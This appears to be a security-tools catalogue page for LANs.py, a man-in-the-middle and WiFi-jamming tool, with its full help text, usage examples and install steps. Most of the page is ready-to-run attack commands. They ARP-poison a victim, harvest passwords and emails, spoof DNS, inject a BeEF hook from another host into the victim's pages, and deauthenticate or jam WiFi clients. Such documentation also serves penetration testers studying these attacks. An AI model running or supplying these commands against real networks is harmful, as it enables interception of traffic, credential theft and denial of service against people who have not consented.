LANs.py
LANs.py Description
LANs.py automatically finds the most active WLAN users then spies on one of them and/or inject arbitrary HTML/JS into pages they visit.
Individually poisons the ARP tables of the target box, the router and the DNS server if necessary. Does not poison anyone else on the network. Displays all most the interesting bits of their traffic and can inject custom html into pages they visit. Cleans up after itself.
Also can be used to continuously jam nearby WiFi networks. This has an approximate range of a 1 block radius, but this can vary based off of the strength of your WiFi card. This can be fine-tuned to allow jamming of everyone or even just one client. Cannot jam WiFi and spy simultaneously.
Homepage: https://github.com/DanMcInerney/LANs.py
Author: Dan McInerney
License: GPLv3
LANs.py Help
usage:
LANs.py [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS] [-vmac VICTIMMAC]
[-d] [-v] [-dns DNSSPOOF] [-a] [-set] [-p] [-na] [-n]
[-i INTERFACE] [-r REDIRECTTO] [-rip ROUTERIP]
[-rmac ROUTERMAC] [-pcap PCAP] [-s SKIP] [-ch CHANNEL]
[-m MAXIMUM] [-no] [-t TIMEINTERVAL] [--packets PACKETS]
[--directedonly] [--accesspoint ACCESSPOINT] [--jam]
optional arguments:
-h, --help show this help message and exit
-b BEEF, --beef BEEF Inject a BeEF hook URL. Example usage: -b
http://192.168.0.3:3000/hook.js
-c CODE, --code CODE Inject arbitrary html. Example usage (include quotes):
-c '<title>New title</title>'
-u, --urlspy Show all URLs and search terms the victim visits or
enters minus URLs that end in .jpg, .png, .gif, .css,
and .js to make the output much friendlier. Also
truncates URLs at 150 characters. Use -v to print all
URLs and without truncation.
-ip IPADDRESS, --ipaddress IPADDRESS
Enter IP address of victim and skip the arp ping at
the beginning which would give you a list of possible
targets. Usage: -ip <victim IP>
-vmac VICTIMMAC, --victimmac VICTIMMAC
Set the victim MAC; by default the script will attempt
a few different ways of getting this so this option
hopefully won't be necessary
-d, --driftnet Open an xterm window with driftnet.
-v, --verboseURL Shows all URLs the victim visits but doesn't limit the
URL to 150 characters like -u does.
-dns DNSSPOOF, --dnsspoof DNSSPOOF
Spoof DNS responses of a specific domain. Enter domain
after this argument. An argument like [facebook.com]
will match all subdomains of facebook.com
-a, --dnsall Spoof all DNS responses
-set, --setoolkit Start Social Engineer's Toolkit in another window.
-p, --post Print unsecured HTTP POST loads, IMAP/POP/FTP/IRC/HTTP
usernames/passwords and incoming/outgoing emails. Will
also decode base64 encrypted POP/IMAP
username/password combos for you.
-na, --nmapaggressive
Aggressively scan the target for open ports and
services in the background. Output to
ip.add.re.ss.log.txt where ip.add.re.ss is the
victim's IP.
-n, --nmap Scan the target for open ports prior to starting to
sniffing their packets.
-i INTERFACE, --interface INTERFACE
Choose the interface to use. Default is the first one
that shows up in `ip route`.
-r REDIRECTTO, --redirectto REDIRECTTO
Must be used with -dns DOMAIN option. Redirects the
victim to the IP in this argument when they visit the
domain in the -dns DOMAIN option
-rip ROUTERIP, --routerip ROUTERIP
Set the router IP; by default the script with attempt
a few different ways of getting this so this option
hopefully won't be necessary
-rmac ROUTERMAC, --routermac ROUTERMAC
Set the router MAC; by default the script with attempt
a few different ways of getting this so this option
hopefully won't be necessary
-pcap PCAP, --pcap PCAP
Parse through a pcap file
-s SKIP, --skip SKIP Skip deauthing this MAC address. Example: -s
00:11:BB:33:44:AA
-ch CHANNEL, --channel CHANNEL
Listen on and deauth only clients on the specified
channel. Example: -ch 6
-m MAXIMUM, --maximum MAXIMUM
Choose the maximum number of clients to deauth. List
of clients will be emptied and repopulated after
hitting the limit. Example: -m 5
-no, --noupdate Do not clear the deauth list when the maximum (-m)
number of client/AP combos is reached. Must be used in
conjunction with -m. Example: -m 10 -n
-t TIMEINTERVAL, --timeinterval TIMEINTERVAL
Choose the time interval between packets being sent.
Default is as fast as possible. If you see scapy
errors like 'no buffer space' try: -t .00001
--packets PACKETS Choose the number of packets to send in each deauth
burst. Default value is 1; 1 packet to the client and
1 packet to the AP. Send 2 deauth packets to the
client and 2 deauth packets to the AP: -p 2
--directedonly Skip the deauthentication packets to the broadcast
address of the access points and only send them to
client/AP pairs
--accesspoint ACCESSPOINT
Enter the MAC address of a specific access point to
target
--jam Jam all wifi in range
LANs.py Usage Example
Common usage:
python LANs.py -u -p
Active target identification which ARP spoofs the chosen target and outputs all the interesting non-HTTPS data they send or request. There's no -ip option so this will ARP scan the network, compare it to a live running promiscuous capture, and list all the clients on the network. Attempts to tag the targets with a Windows netbios name and prints how many data packets they are sending/receiving. The ability to capture data packets they send is very dependent on physical proximity and the power of your network card. Ctrl-C when you're ready and pick your target which it will then ARP spoof.
Supports interception and harvesting of data from the following protocols: HTTP, FTP, IMAP, POP3, IRC. Will print the first 135 characters of URLs visited and ignore URLs ending in .jpg, .jpeg, .gif, .css, .ico, .js, .svg, and .woff. Will also print all protocol username/passwords entered, searches made on any site, emails sent/received, and IRC messages sent/received.
Running LANs.py without argument will give you the list of active targets and upon selecting one, it will act as a simple ARP spoofer.
Another common usage:
python LANs.py -u -p -d -ip 192.168.0.10
-d: open an xterm with driftnet to see all images they view
-ip: target this IP address and skip the active targeting at the beginning
HTML injection:
python LANs.py -b http://192.168.0.5:3000/hook.js
Inject a BeEF hook URL into pages the victim visits. This just wraps the argument in <script> tags so you can really enter any location of a javascript file. Attempts to insert it after the first tag found in the page's HTML.
python LANs.py -c '<title>Owned.</title>'
Inject arbitrary HTML into pages the victim visits. First tries to inject it after the first <head> tag and failing that, injects prior to the first </head> tag. This example will change the page title to 'Owned.'
Read from pcap:
python LANs.py -pcap libpcapfilename -ip 192.168.0.10
To read from a pcap file you must include the target's IP address with the -ip option. It must also be in libpcap form which is the most common anyway. One advantage of reading from a pcap file is that you do not need to be root to execute the script.
DNS spoofing
python LANs.py -a -r 80.87.128.67 python LANs.py -dns eff.org
Example 1: The -a option will spoof every single DNS request the victim makes and when used in conjunction with -r it will redirect them to -r's argument address. The victim will be redirected to stallman.org (80.87.128.67) no matter what they type in the address bar.
Example 2: This will spoof the domain eff.org and subdomains of eff.org. When there is no -r argument present with the -a or -dns arguments the script will default to sending the victim to the attacker's IP address. If the victim tries to go to eff.org they will be redirected to the attacker's IP.
Most aggressive usage:
python LANs.py -v -d -p -n -na -set -a -r 80.87.128.67 -c '<title>Owned.</title>' -b http://192.168.0.5:3000/hook.js -ip 192.168.0.10
Jam all WiFi networks:
python LANs.py --jam
Jam just one access point (router):
python Lans.py --jam --accesspoint 01:MA:C0:AD:DY
How to install LANs.py
Installation on Kali Linux
sudo apt-get install -y python-nfqueue python-scapy python-twisted nbtscan git clone https://github.com/DanMcInerney/LANs.py.git cd LANs.py/ sudo ./LANs.py --help
LANs.py Screenshots
LANs.py Tutorials
- How to perform selective jamming of Wi-Fi networks and clients (DoS attack on individual access points / clients)
- Three ways to put wireless interface in Monitor mode and Managed mode
- USB Wi-Fi Adapters with monitor mode and wireless injection (100% compatible with Kali Linux) 2021
Related tools
- Ettercap (53.7%)
- SSLstrip (SSLStrip+) (50.3%)
- MITMf (48.3%)
- Bettercap (48.3%)
- Etterlog (41.5%)
- Besside-ng (RANDOM - 9.3%)
Comments are Closed